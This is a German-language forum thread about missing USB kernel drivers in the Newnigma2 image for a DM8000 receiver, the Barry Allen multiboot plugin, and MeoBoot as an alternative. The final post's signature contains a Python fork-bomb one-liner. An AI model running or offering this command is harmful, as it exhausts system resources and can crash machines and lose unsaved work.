Hat Newnigma2 2.8.1 USB Treiber

    • Hat Newnigma2 2.8.1 USB Treiber

      Hallo,
      ich würde gerne mit Newnigma im Flash meiner DM8000 das Multibooten mit BA 5.x beibringen, die aktuelle Version von BA verweigert aber die insatlation bei Newnigma mit der Angabe keine USB-Teiber zu finden.

      Sind diese wirklich nicht enthalten?

      Können diese nachträglich instaliert werden?

      Gruß
      aufdersuche
    • Original von aufdersuche
      ;( da komm ich nicht rein :baby:


      Jo stimmt, das ist ein geschlossener Bereich, wo drauf verlinkt wurde, nutzt Dir also nichts.
      Da steht aber eigentlich auch nichts Anderes, als das die Treiber im Kernel sein muessen, was sie aber in unserem Image derzeit nicht sind und auch so bald nicht rein wandern werden.
      "Remember, if it's psychobilly, it's gotta have some rockabilly in it somwhere. It ain't just punk with a double bass." (P.Paul Fenech)
    • Original von LoUiS
      ... muessen, was sie aber in unserem Image derzeit nicht sind und auch so bald nicht rein wandern werden.


      Da drängt sich mir die Frage auf: Warum eigentlich nicht?
      Newnigma ist für mich das Image das ich im Flash haben möchte, BA würde es ermöglichen andere Images auf der Cf-card zu haben und zu testen.

      Gruß
      aufdersuche
    • Original von aufdersuche
      Original von LoUiS
      ... muessen, was sie aber in unserem Image derzeit nicht sind und auch so bald nicht rein wandern werden.


      Da drängt sich mir die Frage auf: Warum eigentlich nicht?
      Newnigma ist für mich das Image das ich im Flash haben möchte, BA würde es ermöglichen andere Images auf der Cf-card zu haben und zu testen.

      Gruß
      aufdersuche


      ganz einfach es kann ein usb gerät bei uns chrashen ohne das die box stehen bleibtsie ist weiter bedienbar.
      ist usb im kernel ist da schicht da hilft nur noch stecker ziehen
      » time to say goodbye «

      Konfuzius sagt:
      Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.
    • Original von aufdersucheDa drängt sich mir die Frage auf: Warum eigentlich nicht?


      Weil das nicht unerhebliche Umbauten im Image erzwingen wuerde, die wir, nur um ein Plugin wie BA zu supporten, nicht in taetigen werden. Die daraus resultierenden Probleme stehen in keinem Verhaeltnis zum Nutzen.
      Meine Meinung: Es war Gutemines Entscheidung auf USB Support im Kernel umzusteigen, nicht unsere und ich persoenlich kann eigentlich nicht einsehen, warum jetzt alle Imagebauer springen sollen, nur weil einer meint er muesse jetzt alles anders machen. ;)
      "Remember, if it's psychobilly, it's gotta have some rockabilly in it somwhere. It ain't just punk with a double bass." (P.Paul Fenech)
    • ich glaub ich bin der einzige der den sinn von ba nicht verstanden hat..es gibt nicht umsonst viele gruende den unsinn von gutemine nicht zu installieren :)

      und da es eh nicht supported wird von newnigma2, sind weitere diskusionen eh nicht noetig..
    • Original von oZxS
      ich glaub ich bin der einzige der den sinn von ba nicht verstanden hat..es gibt nicht umsonst viele gruende den unsinn von gutemine nicht zu installieren :)

      und da es eh nicht supported wird von newnigma2, sind weitere diskusionen eh nicht noetig..



      ... tausend tolle Sachen die gibt es überall zu sehen .... :] :D =)


      da werde ich wohl mal Meoboot testen!
    • Hi!
      Ich werde mir demnächst auch Meoboot installieren, weil wegen BA 5> nicht unbedingt OoZooN - Image flashen will. Wenn das nicht genug flexibel ist, dann bleibt wieder draußen, am Anfang gabt es keine andere Möglichkeit die Images von der CF auszuprobieren, heue ist aber kein Problem mehr.

      Grüße!
    • Solllte auch mit dem Orginal gehen, Newnigma hat ja auch keine USB Treiber im image, ich habe es allerdings noch nicht getestet.
      Werden bei Meoboot nicht auch dei Treiber aus dem Flash geladen, wenn ja sollte ein neueres Image im flash sein je nach Image das Du dann auf die CF geben möchtest.

      gruß
      aufdersuche
    • was ich meine?
      daß wir schon sehr oft geschrieben haben, daß wir multibootsysteme nicht supporten, weil es da immer wieder zu problemen kommt.

      nn2 in den flash und gut ist.
      der rest liegt in deiner verantwortung / deinem können
    • Original von natter22
      Hallo!
      Und was meinst Du dazu, wird es gehen: Flash - Original DMM-Image (MeoBoot per FTP), CF-Karte - NewNigma2?

      Grüße!


      geht einwandfrei...ich kann meoboot nur jedem Barry Allen geschädigten empfehlen das meoboot ist auf das geringste konzipiert ohne viel schnickschnack und funktioniert auch problemlos mit dem original cvs

      auch hab ich mit dem meoboot wesentlich weniger problemen mit allen images auf dem usb stick....
    • Original von oZxS
      ich glaub ich bin der einzige der den sinn von ba nicht verstanden hat..es gibt nicht umsonst viele gruende den unsinn von gutemine nicht zu installieren :)

      und da es eh nicht supported wird von newnigma2, sind weitere diskusionen eh nicht noetig..


      *falsch ich erkenne auch keinen sinn*
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !